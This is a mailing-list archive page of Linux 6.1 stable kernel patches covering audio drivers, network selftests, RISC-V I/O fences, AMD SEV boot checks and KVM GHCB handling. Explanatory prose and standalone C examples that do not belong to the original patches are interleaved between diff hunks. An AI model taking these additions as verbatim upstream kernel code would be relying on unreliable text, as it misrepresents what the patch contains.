+diff --git a/sound/soc/meson/axg-tdm-formatter.c b/sound/soc/meson/axg-tdm-formatter.c
+index 9883dc777f630..63333a2b0a9c3 100644
+--- a/sound/soc/meson/axg-tdm-formatter.c
++++ b/sound/soc/meson/axg-tdm-formatter.c
+@@ -30,27 +30,32 @@ int axg_tdm_formatter_set_channel_masks(struct regmap *map,
+ 					struct axg_tdm_stream *ts,
+ 					unsigned int offset)
+ {
+-	unsigned int val, ch = ts->channels;
+-	unsigned long mask;
+-	int i, j;
++	unsigned int ch = ts->channels;
++	u32 val[AXG_TDM_NUM_LANES];
++	int i, j, k;
++
++	/*
++	 * We need to mimic the slot distribution used by the HW to keep the
++	 * channel placement consistent regardless of the number of channels
++	 * in the stream. This is why the odd algorithm below is used.
++	 */
++	memset(val, 0, sizeof(*val) * AXG_TDM_NUM_LANES);
+ 
+ 	/*
+ 	 * Distribute the channels of the stream over the available slots
+-	 * of each TDM lane
++	 * of each TDM lane. We need to go over the 32 slots ...
+ 	 */
+-	for (i = 0; i < AXG_TDM_NUM_LANES; i++) {
+-		val = 0;
+-		mask = ts->mask[i];
+-
+-		for (j = find_first_bit(&mask, 32);
+-		     (j < 32) && ch;
+-		     j = find_next_bit(&mask, 32, j + 1)) {
+-			val |= 1 << j;
+-			ch -= 1;
++	for (i = 0; (i < 32) && ch; i += 2) {
++		/* ... of all the lanes ... */
++		for (j = 0; j < AXG_TDM_NUM_LANES; j++) {
++			/* ... then distribute the channels in pairs */
++			for (k = 0; k < 2; k++) {
++				if ((BIT(i + k) & ts->mask[j]) && ch) {
++					val[j] |= BIT(i + k);
++					ch -= 1;
++				}
++			}
+ 		}
+-
+-		regmap_write(map, offset, val);
+-		offset += regmap_get_reg_stride(map);
+ 	}
+ 
+ 	/*
+@@ -63,6 +68,11 @@ int axg_tdm_formatter_set_channel_masks(struct regmap *map,
+ 		return -EINVAL;
+ 	}
+ 
++	for (i = 0; i < AXG_TDM_NUM_LANES; i++) {
++		regmap_write(map, offset, val[i]);
++		offset += regmap_get_reg_stride(map);
++	}
++
+ 	return 0;
+ }
+ EXPORT_SYMBOL_GPL(axg_tdm_formatter_set_channel_masks);
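
The rewritten loop hands out channels two slots at a time across every lane before advancing to the next slot pair, rather than exhausting lane 0 first; that is what keeps a channel's lane/slot position stable when the stream's channel count changes. The algorithm models easily in isolation (lane count and masks below are made up for illustration):

    #include <inttypes.h>
    #include <stdint.h>
    #include <stdio.h>

    #define NUM_LANES 4

    int main(void)
    {
        uint32_t mask[NUM_LANES] = { 0xff, 0xff, 0x00, 0x00 };  /* example */
        uint32_t val[NUM_LANES] = { 0 };
        unsigned int ch = 6;            /* channels to place */

        /* Walk the 32 slots in pairs, visiting every lane per pair. */
        for (int i = 0; i < 32 && ch; i += 2)
            for (int j = 0; j < NUM_LANES; j++)
                for (int k = 0; k < 2; k++)
                    if ((mask[j] & (1u << (i + k))) && ch) {
                        val[j] |= 1u << (i + k);
                        ch--;
                    }

        for (int j = 0; j < NUM_LANES; j++)
            printf("lane %d: 0x%08" PRIx32 "\n", j, val[j]);
        return 0;                       /* lanes 0/1 get 0x0f and 0x03 */
    }
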
+diff --git a/sound/soc/sof/amd/acp.h b/sound/soc/sof/amd/acp.h
+index dd3c072d01721..14148c311f504 100644
+--- a/sound/soc/sof/amd/acp.h
++++ b/sound/soc/sof/amd/acp.h
+@@ -54,6 +54,9 @@
+ 
+ #define ACP_DSP_TO_HOST_IRQ			0x04
+ 
++#define ACP_RN_PCI_ID				0x01
++#define ACP_RMB_PCI_ID				0x6F
++
+ #define HOST_BRIDGE_CZN				0x1630
+ #define HOST_BRIDGE_RMB				0x14B5
+ #define ACP_SHA_STAT				0x8000
+diff --git a/sound/soc/sof/amd/pci-rmb.c b/sound/soc/sof/amd/pci-rmb.c
+index 4e1de462b431b..5698d910b26f3 100644
+--- a/sound/soc/sof/amd/pci-rmb.c
++++ b/sound/soc/sof/amd/pci-rmb.c
+@@ -90,6 +90,9 @@ static int acp_pci_rmb_probe(struct pci_dev *pci, const struct pci_device_id *pc
+ 	unsigned int flag, i, addr;
+ 	int ret;
+ 
++	if (pci->revision != ACP_RMB_PCI_ID)
++		return -ENODEV;
++
+ 	flag = snd_amd_acp_find_config(pci);
+ 	if (flag != FLAG_AMD_SOF && flag != FLAG_AMD_SOF_ONLY_DMIC)
+ 		return -ENODEV;
+diff --git a/sound/soc/sof/amd/pci-rn.c b/sound/soc/sof/amd/pci-rn.c
+index fca40b261671b..9189f63632789 100644
+--- a/sound/soc/sof/amd/pci-rn.c
++++ b/sound/soc/sof/amd/pci-rn.c
+@@ -90,6 +90,9 @@ static int acp_pci_rn_probe(struct pci_dev *pci, const struct pci_device_id *pci
+ 	unsigned int flag, i, addr;
+ 	int ret;
+ 
++	if (pci->revision != ACP_RN_PCI_ID)
++		return -ENODEV;
++
+ 	flag = snd_amd_acp_find_config(pci);
+ 	if (flag != FLAG_AMD_SOF && flag != FLAG_AMD_SOF_ONLY_DMIC)
+ 		return -ENODEV;
+diff --git a/sound/soc/sof/core.c b/sound/soc/sof/core.c
+index 625977a29d8a8..75a1e2c6539f2 100644
+--- a/sound/soc/sof/core.c
++++ b/sound/soc/sof/core.c
+@@ -479,8 +479,10 @@ int snd_sof_device_shutdown(struct device *dev)
+ 	if (IS_ENABLED(CONFIG_SND_SOC_SOF_PROBE_WORK_QUEUE))
+ 		cancel_work_sync(&sdev->probe_work);
+ 
+-	if (sdev->fw_state == SOF_FW_BOOT_COMPLETE)
++	if (sdev->fw_state == SOF_FW_BOOT_COMPLETE) {
++		sof_fw_trace_free(sdev);
+ 		return snd_sof_shutdown(sdev);
++	}
+ 
+ 	return 0;
+ }
+diff --git a/sound/soc/sof/intel/hda.c b/sound/soc/sof/intel/hda.c
+index 1188ec51816bd..63764afdcf617 100644
+--- a/sound/soc/sof/intel/hda.c
++++ b/sound/soc/sof/intel/hda.c
+@@ -1309,12 +1309,22 @@ static void hda_generic_machine_select(struct snd_sof_dev *sdev,
+ 			hda_mach->mach_params.dmic_num = dmic_num;
+ 			pdata->tplg_filename = tplg_filename;
+ 
+-			if (codec_num == 2) {
++			if (codec_num == 2 ||
++			    (codec_num == 1 && !HDA_IDISP_CODEC(bus->codec_mask))) {
+ 				/*
+ 				 * Prevent SoundWire links from starting when an external
+ 				 * HDaudio codec is used
+ 				 */
+ 				hda_mach->mach_params.link_mask = 0;
++			} else {
++				/*
++				 * Allow SoundWire links to start when no external HDaudio codec
++				 * was detected. This will not create a SoundWire card but
++				 * will help detect if any SoundWire codec reports as ATTACHED.
++				 */
++				struct sof_intel_hda_dev *hdev = sdev->pdata->hw_pdata;
++
++				hda_mach->mach_params.link_mask = hdev->info.link_mask;
+ 			}
+ 
+ 			*mach = hda_mach;
+diff --git a/sound/usb/quirks-table.h b/sound/usb/quirks-table.h
+index efb4a3311cc59..5d72dc8441cbb 100644
+--- a/sound/usb/quirks-table.h
++++ b/sound/usb/quirks-table.h
+@@ -4507,6 +4507,35 @@ YAMAHA_DEVICE(0x7010, "UB99"),
+ 		}
+ 	}
+ },
++{
++	/* Advanced modes of the Mythware XA001AU.
++	 * For the standard mode, Mythware XA001AU has ID ffad:a001
++	 */
++	USB_DEVICE_VENDOR_SPEC(0xffad, 0xa001),
++	.driver_info = (unsigned long) &(const struct snd_usb_audio_quirk) {
++		.vendor_name = "Mythware",
++		.product_name = "XA001AU",
++		.ifnum = QUIRK_ANY_INTERFACE,
++		.type = QUIRK_COMPOSITE,
++		.data = (const struct snd_usb_audio_quirk[]) {
++			{
++				.ifnum = 0,
++				.type = QUIRK_IGNORE_INTERFACE,
++			},
++			{
++				.ifnum = 1,
++				.type = QUIRK_AUDIO_STANDARD_INTERFACE,
++			},
++			{
++				.ifnum = 2,
++				.type = QUIRK_AUDIO_STANDARD_INTERFACE,
++			},
++			{
++				.ifnum = -1
++			}
++		}
++	}
++},
+ 
+ #undef USB_DEVICE_VENDOR_SPEC
+ #undef USB_AUDIO_DEVICE
+diff --git a/tools/testing/selftests/net/forwarding/mirror_gre_changes.sh b/tools/testing/selftests/net/forwarding/mirror_gre_changes.sh
+index aff88f78e3391..5ea9d63915f77 100755
+--- a/tools/testing/selftests/net/forwarding/mirror_gre_changes.sh
++++ b/tools/testing/selftests/net/forwarding/mirror_gre_changes.sh
+@@ -72,7 +72,8 @@ test_span_gre_ttl()
+ 
+ 	RET=0
+ 
+-	mirror_install $swp1 ingress $tundev "matchall $tcflags"
++	mirror_install $swp1 ingress $tundev \
++		"prot ip flower $tcflags ip_prot icmp"
+ 	tc filter add dev $h3 ingress pref 77 prot $prot \
+ 		flower skip_hw ip_ttl 50 action pass
+ 
+diff --git a/tools/testing/selftests/net/forwarding/tc_actions.sh b/tools/testing/selftests/net/forwarding/tc_actions.sh
+index 919c0dd9fe4bc..b0f5e55d2d0b2 100755
+--- a/tools/testing/selftests/net/forwarding/tc_actions.sh
++++ b/tools/testing/selftests/net/forwarding/tc_actions.sh
+@@ -9,6 +9,8 @@ NUM_NETIFS=4
+ source tc_common.sh
+ source lib.sh
+ 
++require_command ncat
++
+ tcflags="skip_hw"
+ 
+ h1_create()
+@@ -201,10 +203,10 @@ mirred_egress_to_ingress_test()
+ 
+ mirred_egress_to_ingress_tcp_test()
+ {
+-	local tmpfile=$(mktemp) tmpfile1=$(mktemp)
++	mirred_e2i_tf1=$(mktemp) mirred_e2i_tf2=$(mktemp)
+ 
+ 	RET=0
+-	dd conv=sparse status=none if=/dev/zero bs=1M count=2 of=$tmpfile
++	dd conv=sparse status=none if=/dev/zero bs=1M count=2 of=$mirred_e2i_tf1
+ 	tc filter add dev $h1 protocol ip pref 100 handle 100 egress flower \
+ 		$tcflags ip_proto tcp src_ip 192.0.2.1 dst_ip 192.0.2.2 \
+ 			action ct commit nat src addr 192.0.2.2 pipe \
+@@ -220,11 +222,11 @@ mirred_egress_to_ingress_tcp_test()
+ 		ip_proto icmp \
+ 			action drop
+ 
+-	ip vrf exec v$h1 nc --recv-only -w10 -l -p 12345 -o $tmpfile1  &
++	ip vrf exec v$h1 ncat --recv-only -w10 -l -p 12345 -o $mirred_e2i_tf2 &
+ 	local rpid=$!
+-	ip vrf exec v$h1 nc -w1 --send-only 192.0.2.2 12345 <$tmpfile
++	ip vrf exec v$h1 ncat -w1 --send-only 192.0.2.2 12345 <$mirred_e2i_tf1
+ 	wait -n $rpid
+-	cmp -s $tmpfile $tmpfile1
++	cmp -s $mirred_e2i_tf1 $mirred_e2i_tf2
+ 	check_err $? "server output check failed"
+ 
+ 	$MZ $h1 -c 10 -p 64 -a $h1mac -b $h1mac -A 192.0.2.1 -B 192.0.2.1 \
+@@ -241,7 +243,7 @@ mirred_egress_to_ingress_tcp_test()
+ 	tc filter del dev $h1 egress protocol ip pref 101 handle 101 flower
+ 	tc filter del dev $h1 ingress protocol ip pref 102 handle 102 flower
+ 
+-	rm -f $tmpfile $tmpfile1
++	rm -f $mirred_e2i_tf1 $mirred_e2i_tf2
+ 	log_test "mirred_egress_to_ingress_tcp ($tcflags)"
+ }
+ 
+@@ -270,6 +272,8 @@ setup_prepare()
+ 
+ cleanup()
+ {
++	local tf
++
+ 	pre_cleanup
+ 
+ 	switch_destroy
+@@ -280,6 +284,8 @@ cleanup()
+ 
+ 	ip link set $swp2 address $swp2origmac
+ 	ip link set $swp1 address $swp1origmac
++
++	for tf in $mirred_e2i_tf1 $mirred_e2i_tf2; do rm -f $tf; done
+ }
+ 
+ mirred_egress_redirect_test()



* [gentoo-commits] proj/linux-patches:6.1 commit in: /
@ 2023-08-16 18:32 Mike Pagano
  0 siblings, 0 replies; 161+ messages in thread
From: Mike Pagano @ 2023-08-16 18:32 UTC (permalink / raw
  To: gentoo-commits

commit:     c972607e14a51e876fdd25e5bd58d020f2ca1c0a
Author:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
AuthorDate: Wed Aug 16 17:16:04 2023 +0000
Commit:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
CommitDate: Wed Aug 16 17:16:04 2023 +0000
URL:        https://gitweb.gentoo.org/proj/linux-patches.git/commit/?id=c972607e

Linux patch 6.1.46

Signed-off-by: Mike Pagano <mpagano <AT> gentoo.org>

 0000_README             |    4 +
 1045_linux-6.1.46.patch | 6914 +++++++++++++++++++++++++++++++++++++++++++++++
 2 files changed, 6918 insertions(+)

diff --git a/0000_README b/0000_README
index 93d96552..0e741144 100644
--- a/0000_README
+++ b/0000_README
@@ -223,6 +223,10 @@ Patch:  1044_linux-6.1.45.patch
 From:   https://www.kernel.org
 Desc:   Linux 6.1.45
 
+Patch:  1045_linux-6.1.46.patch
+From:   https://www.kernel.org
+Desc:   Linux 6.1.46
+
 Patch:  1500_XATTR_USER_PREFIX.patch
 From:   https://bugs.gentoo.org/show_bug.cgi?id=470644
 Desc:   Support for namespace user.pax.* on tmpfs.

diff --git a/1045_linux-6.1.46.patch b/1045_linux-6.1.46.patch
new file mode 100644
index 00000000..5e1f1095
--- /dev/null
+++ b/1045_linux-6.1.46.patch
@@ -0,0 +1,6914 @@
+diff --git a/Makefile b/Makefile
+index 82c958299e982..bdb965177db52 100644
+--- a/Makefile
++++ b/Makefile
+@@ -1,7 +1,7 @@
+ # SPDX-License-Identifier: GPL-2.0
+ VERSION = 6
+ PATCHLEVEL = 1
+-SUBLEVEL = 45
++SUBLEVEL = 46
+ EXTRAVERSION =
+ NAME = Curry Ramen
+ 
+diff --git a/arch/alpha/kernel/setup.c b/arch/alpha/kernel/setup.c
+index 33bf3a6270027..45a920ba4921d 100644
+--- a/arch/alpha/kernel/setup.c
++++ b/arch/alpha/kernel/setup.c
+@@ -385,8 +385,7 @@ setup_memory(void *kernel_end)
+ #endif /* CONFIG_BLK_DEV_INITRD */
+ }
+ 
+-int __init
+-page_is_ram(unsigned long pfn)
++int page_is_ram(unsigned long pfn)
+ {
+ 	struct memclust_struct * cluster;
+ 	struct memdesc_struct * memdesc;
+diff --git a/arch/loongarch/Kconfig b/arch/loongarch/Kconfig
+index 270742cc3ca49..e737dc8cd660c 100644
+--- a/arch/loongarch/Kconfig
++++ b/arch/loongarch/Kconfig
+@@ -10,7 +10,6 @@ config LOONGARCH
+ 	select ARCH_ENABLE_MEMORY_HOTPLUG
+ 	select ARCH_ENABLE_MEMORY_HOTREMOVE
+ 	select ARCH_HAS_ACPI_TABLE_UPGRADE	if ACPI
+-	select ARCH_HAS_CPU_FINALIZE_INIT
+ 	select ARCH_HAS_NON_OVERLAPPING_ADDRESS_SPACE
+ 	select ARCH_HAS_PTE_SPECIAL
+ 	select ARCH_HAS_TICK_BROADCAST if GENERIC_CLOCKEVENTS_BROADCAST
+diff --git a/arch/loongarch/kernel/setup.c b/arch/loongarch/kernel/setup.c
+index 29725b37b35ca..ae436def7ee98 100644
+--- a/arch/loongarch/kernel/setup.c
++++ b/arch/loongarch/kernel/setup.c
+@@ -12,7 +12,6 @@
+  */
+ #include <linux/init.h>
+ #include <linux/acpi.h>
+-#include <linux/cpu.h>
+ #include <linux/dmi.h>
+ #include <linux/efi.h>
+ #include <linux/export.h>
+@@ -81,11 +80,6 @@ const char *get_system_type(void)
+ 	return "generic-loongson-machine";
+ }
+ 
+-void __init arch_cpu_finalize_init(void)
+-{
+-	alternative_instructions();
+-}
+-
+ static const char *dmi_string_parse(const struct dmi_header *dm, u8 s)
+ {
+ 	const u8 *bp = ((u8 *) dm) + dm->length;
+diff --git a/arch/riscv/include/asm/mmio.h b/arch/riscv/include/asm/mmio.h
+index aff6c33ab0c08..4c58ee7f95ecf 100644
+--- a/arch/riscv/include/asm/mmio.h
++++ b/arch/riscv/include/asm/mmio.h
+@@ -101,9 +101,9 @@ static inline u64 __raw_readq(const volatile void __iomem *addr)
+  * Relaxed I/O memory access primitives. These follow the Device memory
+  * ordering rules but do not guarantee any ordering relative to Normal memory
+  * accesses.  These are defined to order the indicated access (either a read or
+- * write) with all other I/O memory accesses. Since the platform specification
+- * defines that all I/O regions are strongly ordered on channel 2, no explicit
+- * fences are required to enforce this ordering.
++ * write) with all other I/O memory accesses to the same peripheral. Since the
++ * platform specification defines that all I/O regions are strongly ordered on
++ * channel 0, no explicit fences are required to enforce this ordering.
+  */
+ /* FIXME: These are now the same as asm-generic */
+ #define __io_rbr()		do {} while (0)
+@@ -125,14 +125,14 @@ static inline u64 __raw_readq(const volatile void __iomem *addr)
+ #endif
+ 
+ /*
+- * I/O memory access primitives. Reads are ordered relative to any
+- * following Normal memory access. Writes are ordered relative to any prior
+- * Normal memory access.  The memory barriers here are necessary as RISC-V
++ * I/O memory access primitives.  Reads are ordered relative to any following
++ * Normal memory read and delay() loop.  Writes are ordered relative to any
++ * prior Normal memory write.  The memory barriers here are necessary as RISC-V
+  * doesn't define any ordering between the memory space and the I/O space.
+  */
+ #define __io_br()	do {} while (0)
+-#define __io_ar(v)	__asm__ __volatile__ ("fence i,r" : : : "memory")
+-#define __io_bw()	__asm__ __volatile__ ("fence w,o" : : : "memory")
++#define __io_ar(v)	({ __asm__ __volatile__ ("fence i,ir" : : : "memory"); })
++#define __io_bw()	({ __asm__ __volatile__ ("fence w,o" : : : "memory"); })
+ #define __io_aw()	mmiowb_set_pending()
+ 
+ #define readb(c)	({ u8  __v; __io_br(); __v = readb_cpu(c); __io_ar(__v); __v; })
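
The fence strings are RISC-V specific, but the shape is generic: a read ends with an acquire-flavoured barrier so later normal accesses and delay loops cannot be hoisted before it, and a write starts with a release-flavoured barrier so earlier normal writes cannot sink past it. A portable approximation with C11 fences, purely to show where the barriers sit (real readl()/writel() also need fixed-width volatile MMIO accesses):

    #include <stdatomic.h>
    #include <stdint.h>

    static inline uint32_t mmio_read32(const volatile uint32_t *addr)
    {
        uint32_t v = *addr;
        /* RISC-V: "fence i,ir" -- order the read before what follows */
        atomic_thread_fence(memory_order_acquire);
        return v;
    }

    static inline void mmio_write32(volatile uint32_t *addr, uint32_t v)
    {
        /* RISC-V: "fence w,o" -- order prior normal writes before this */
        atomic_thread_fence(memory_order_release);
        *addr = v;
    }

    int main(void)
    {
        static volatile uint32_t fake_reg;   /* stand-in for a device register */

        mmio_write32(&fake_reg, 1);
        return (int)(mmio_read32(&fake_reg) - 1);   /* 0 on success */
    }
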
+diff --git a/arch/riscv/kernel/elf_kexec.c b/arch/riscv/kernel/elf_kexec.c
+index 5372b708fae21..c08bb5c3b3857 100644
+--- a/arch/riscv/kernel/elf_kexec.c
++++ b/arch/riscv/kernel/elf_kexec.c
+@@ -281,7 +281,7 @@ static void *elf_kexec_load(struct kimage *image, char *kernel_buf,
+ 		kbuf.buffer = initrd;
+ 		kbuf.bufsz = kbuf.memsz = initrd_len;
+ 		kbuf.buf_align = PAGE_SIZE;
+-		kbuf.top_down = false;
++		kbuf.top_down = true;
+ 		kbuf.mem = KEXEC_BUF_MEM_UNKNOWN;
+ 		ret = kexec_add_buffer(&kbuf);
+ 		if (ret)
+@@ -425,6 +425,7 @@ int arch_kexec_apply_relocations_add(struct purgatory_info *pi,
+ 		 * sym, instead of searching the whole relsec.
+ 		 */
+ 		case R_RISCV_PCREL_HI20:
++		case R_RISCV_CALL_PLT:
+ 		case R_RISCV_CALL:
+ 			*(u64 *)loc = CLEAN_IMM(UITYPE, *(u64 *)loc) |
+ 				 ENCODE_UJTYPE_IMM(val - addr);
+diff --git a/arch/x86/boot/compressed/idt_64.c b/arch/x86/boot/compressed/idt_64.c
+index 6debb816e83dc..3cdf94b414567 100644
+--- a/arch/x86/boot/compressed/idt_64.c
++++ b/arch/x86/boot/compressed/idt_64.c
+@@ -63,7 +63,14 @@ void load_stage2_idt(void)
+ 	set_idt_entry(X86_TRAP_PF, boot_page_fault);
+ 
+ #ifdef CONFIG_AMD_MEM_ENCRYPT
+-	set_idt_entry(X86_TRAP_VC, boot_stage2_vc);
++	/*
++	 * Clear the second stage #VC handler in case guest types
++	 * needing #VC have not been detected.
++	 */
++	if (sev_status & BIT(1))
++		set_idt_entry(X86_TRAP_VC, boot_stage2_vc);
++	else
++		set_idt_entry(X86_TRAP_VC, NULL);
+ #endif
+ 
+ 	load_boot_idt(&boot_idt_desc);
+diff --git a/arch/x86/boot/compressed/sev.c b/arch/x86/boot/compressed/sev.c
+index d63ad8f99f83a..e65f0968e0d9d 100644
+--- a/arch/x86/boot/compressed/sev.c
++++ b/arch/x86/boot/compressed/sev.c
+@@ -354,13 +354,46 @@ void sev_enable(struct boot_params *bp)
+ 	if (bp)
+ 		bp->cc_blob_address = 0;
+ 
++	/*
++	 * Do an initial SEV capability check before snp_init() which
++	 * loads the CPUID page and the same checks afterwards are done
++	 * without the hypervisor and are trustworthy.
++	 *
++	 * If the HV fakes SEV support, the guest will crash'n'burn
++	 * which is good enough.
++	 */
++
++	/* Check for the SME/SEV support leaf */
++	eax = 0x80000000;
++	ecx = 0;
++	native_cpuid(&eax, &ebx, &ecx, &edx);
++	if (eax < 0x8000001f)
++		return;
++
++	/*
++	 * Check for the SME/SEV feature:
++	 *   CPUID Fn8000_001F[EAX]
++	 *   - Bit 0 - Secure Memory Encryption support
++	 *   - Bit 1 - Secure Encrypted Virtualization support
++	 *   CPUID Fn8000_001F[EBX]
++	 *   - Bits 5:0 - Pagetable bit position used to indicate encryption
++	 */
++	eax = 0x8000001f;
++	ecx = 0;
++	native_cpuid(&eax, &ebx, &ecx, &edx);
++	/* Check whether SEV is supported */
++	if (!(eax & BIT(1)))
++		return;
++
+ 	/*
+ 	 * Setup/preliminary detection of SNP. This will be sanity-checked
+ 	 * against CPUID/MSR values later.
+ 	 */
+ 	snp = snp_init(bp);
+ 
+-	/* Check for the SME/SEV support leaf */
++	/* Now repeat the checks with the SNP CPUID table. */
++
++	/* Recheck the SME/SEV support leaf */
+ 	eax = 0x80000000;
+ 	ecx = 0;
+ 	native_cpuid(&eax, &ebx, &ecx, &edx);
+@@ -368,7 +401,7 @@ void sev_enable(struct boot_params *bp)
+ 		return;
+ 
+ 	/*
+-	 * Check for the SME/SEV feature:
++	 * Recheck for the SME/SEV feature:
+ 	 *   CPUID Fn8000_001F[EAX]
+ 	 *   - Bit 0 - Secure Memory Encryption support
+ 	 *   - Bit 1 - Secure Encrypted Virtualization support
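
This is check-twice-on-purpose: probe leaf 0x8000001f while CPUID may still be hypervisor-controlled (a lying HV merely crashes the guest), then redo the same checks against the trusted SNP CPUID table after snp_init(). The leaf/bit probing itself is plain CPUID and can be reproduced from userspace on x86 (bit meanings as in the comment above):

    #include <cpuid.h>
    #include <stdio.h>

    int main(void)
    {
        unsigned int eax, ebx, ecx, edx;

        /* Highest extended leaf: does 0x8000001f exist at all? */
        __cpuid(0x80000000, eax, ebx, ecx, edx);
        if (eax < 0x8000001f) {
            puts("no SME/SEV leaf");
            return 0;
        }

        __cpuid(0x8000001f, eax, ebx, ecx, edx);
        printf("SME: %u, SEV: %u, C-bit position: %u\n",
               eax & 1, (eax >> 1) & 1, ebx & 0x3f);
        return 0;
    }
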
+diff --git a/arch/x86/entry/vdso/vma.c b/arch/x86/entry/vdso/vma.c
+index 311eae30e0894..1288661397f09 100644
+--- a/arch/x86/entry/vdso/vma.c
++++ b/arch/x86/entry/vdso/vma.c
+@@ -322,8 +322,8 @@ static unsigned long vdso_addr(unsigned long start, unsigned len)
+ 
+ 	/* Round the lowest possible end address up to a PMD boundary. */
+ 	end = (start + len + PMD_SIZE - 1) & PMD_MASK;
+-	if (end >= TASK_SIZE_MAX)
+-		end = TASK_SIZE_MAX;
++	if (end >= DEFAULT_MAP_WINDOW)
++		end = DEFAULT_MAP_WINDOW;
+ 	end -= len;
+ 
+ 	if (end > start) {
+diff --git a/arch/x86/include/asm/processor.h b/arch/x86/include/asm/processor.h
+index 45bf26862b99b..94ea13adb724a 100644
+--- a/arch/x86/include/asm/processor.h
++++ b/arch/x86/include/asm/processor.h
+@@ -867,4 +867,6 @@ bool arch_is_platform_page(u64 paddr);
+ #define arch_is_platform_page arch_is_platform_page
+ #endif
+ 
++extern bool gds_ucode_mitigated(void);
++
+ #endif /* _ASM_X86_PROCESSOR_H */
+diff --git a/arch/x86/kernel/cpu/amd.c b/arch/x86/kernel/cpu/amd.c
+index 43910eb55b2e9..239b302973d7a 100644
+--- a/arch/x86/kernel/cpu/amd.c
++++ b/arch/x86/kernel/cpu/amd.c
+@@ -73,6 +73,7 @@ static const int amd_erratum_1054[] =
+ static const int amd_zenbleed[] =
+ 	AMD_LEGACY_ERRATUM(AMD_MODEL_RANGE(0x17, 0x30, 0x0, 0x4f, 0xf),
+ 			   AMD_MODEL_RANGE(0x17, 0x60, 0x0, 0x7f, 0xf),
++			   AMD_MODEL_RANGE(0x17, 0x90, 0x0, 0x91, 0xf),
+ 			   AMD_MODEL_RANGE(0x17, 0xa0, 0x0, 0xaf, 0xf));
+ 
+ static const int amd_div0[] =
+diff --git a/arch/x86/kernel/vmlinux.lds.S b/arch/x86/kernel/vmlinux.lds.S
+index fd03f5a1f0ef0..e6939ebb606ab 100644
+--- a/arch/x86/kernel/vmlinux.lds.S
++++ b/arch/x86/kernel/vmlinux.lds.S
+@@ -514,11 +514,17 @@ INIT_PER_CPU(irq_stack_backing_store);
+ 
+ #ifdef CONFIG_CPU_SRSO
+ /*
+- * GNU ld cannot do XOR so do: (A | B) - (A & B) in order to compute the XOR
++ * GNU ld cannot do XOR until 2.41.
++ * https://sourceware.org/git/?p=binutils-gdb.git;a=commit;h=f6f78318fca803c4907fb8d7f6ded8295f1947b1
++ *
++ * LLVM lld cannot do XOR until lld-17.
++ * https://github.com/llvm/llvm-project/commit/fae96104d4378166cbe5c875ef8ed808a356f3fb
++ *
++ * Instead do: (A | B) - (A & B) in order to compute the XOR
+  * of the two function addresses:
+  */
+-. = ASSERT(((srso_untrain_ret_alias | srso_safe_ret_alias) -
+-		(srso_untrain_ret_alias & srso_safe_ret_alias)) == ((1 << 2) | (1 << 8) | (1 << 14) | (1 << 20)),
++. = ASSERT(((ABSOLUTE(srso_untrain_ret_alias) | srso_safe_ret_alias) -
++		(ABSOLUTE(srso_untrain_ret_alias) & srso_safe_ret_alias)) == ((1 << 2) | (1 << 8) | (1 << 14) | (1 << 20)),
+ 		"SRSO function pair won't alias");
+ #endif
+ 
+diff --git a/arch/x86/kvm/svm/sev.c b/arch/x86/kvm/svm/sev.c
+index 4cb2e483db533..e0437acb5cf75 100644
+--- a/arch/x86/kvm/svm/sev.c
++++ b/arch/x86/kvm/svm/sev.c
+@@ -2410,15 +2410,18 @@ static void sev_es_sync_from_ghcb(struct vcpu_svm *svm)
+ 	 */
+ 	memset(vcpu->arch.regs, 0, sizeof(vcpu->arch.regs));
+ 
+-	vcpu->arch.regs[VCPU_REGS_RAX] = ghcb_get_rax_if_valid(ghcb);
+-	vcpu->arch.regs[VCPU_REGS_RBX] = ghcb_get_rbx_if_valid(ghcb);
+-	vcpu->arch.regs[VCPU_REGS_RCX] = ghcb_get_rcx_if_valid(ghcb);
+-	vcpu->arch.regs[VCPU_REGS_RDX] = ghcb_get_rdx_if_valid(ghcb);
+-	vcpu->arch.regs[VCPU_REGS_RSI] = ghcb_get_rsi_if_valid(ghcb);
++	BUILD_BUG_ON(sizeof(svm->sev_es.valid_bitmap) != sizeof(ghcb->save.valid_bitmap));
++	memcpy(&svm->sev_es.valid_bitmap, &ghcb->save.valid_bitmap, sizeof(ghcb->save.valid_bitmap));
+ 
+-	svm->vmcb->save.cpl = ghcb_get_cpl_if_valid(ghcb);
++	vcpu->arch.regs[VCPU_REGS_RAX] = kvm_ghcb_get_rax_if_valid(svm, ghcb);
++	vcpu->arch.regs[VCPU_REGS_RBX] = kvm_ghcb_get_rbx_if_valid(svm, ghcb);
++	vcpu->arch.regs[VCPU_REGS_RCX] = kvm_ghcb_get_rcx_if_valid(svm, ghcb);
++	vcpu->arch.regs[VCPU_REGS_RDX] = kvm_ghcb_get_rdx_if_valid(svm, ghcb);
++	vcpu->arch.regs[VCPU_REGS_RSI] = kvm_ghcb_get_rsi_if_valid(svm, ghcb);
+ 
+-	if (ghcb_xcr0_is_valid(ghcb)) {
++	svm->vmcb->save.cpl = kvm_ghcb_get_cpl_if_valid(svm, ghcb);
++
++	if (kvm_ghcb_xcr0_is_valid(svm)) {
+ 		vcpu->arch.xcr0 = ghcb_get_xcr0(ghcb);
+ 		kvm_update_cpuid_runtime(vcpu);
+ 	}
+@@ -2429,14 +2432,21 @@ static void sev_es_sync_from_ghcb(struct vcpu_svm *svm)
+ 	control->exit_code_hi = upper_32_bits(exit_code);
+ 	control->exit_info_1 = ghcb_get_sw_exit_info_1(ghcb);
+ 	control->exit_info_2 = ghcb_get_sw_exit_info_2(ghcb);
++	svm->sev_es.sw_scratch = kvm_ghcb_get_sw_scratch_if_valid(svm, ghcb);
+ 
+ 	/* Clear the valid entries fields */
+ 	memset(ghcb->save.valid_bitmap, 0, sizeof(ghcb->save.valid_bitmap));
+ }
+ 
++static u64 kvm_ghcb_get_sw_exit_code(struct vmcb_control_area *control)
++{
++	return (((u64)control->exit_code_hi) << 32) | control->exit_code;
++}
++
+ static int sev_es_validate_vmgexit(struct vcpu_svm *svm)
+ {
+-	struct kvm_vcpu *vcpu;
++	struct vmcb_control_area *control = &svm->vmcb->control;
++	struct kvm_vcpu *vcpu = &svm->vcpu;
+ 	struct ghcb *ghcb;
+ 	u64 exit_code;
+ 	u64 reason;
+@@ -2447,7 +2457,7 @@ static int sev_es_validate_vmgexit(struct vcpu_svm *svm)
+ 	 * Retrieve the exit code now even though it may not be marked valid
+ 	 * as it could help with debugging.
+ 	 */
+-	exit_code = ghcb_get_sw_exit_code(ghcb);
++	exit_code = kvm_ghcb_get_sw_exit_code(control);
+ 
+ 	/* Only GHCB Usage code 0 is supported */
+ 	if (ghcb->ghcb_usage) {
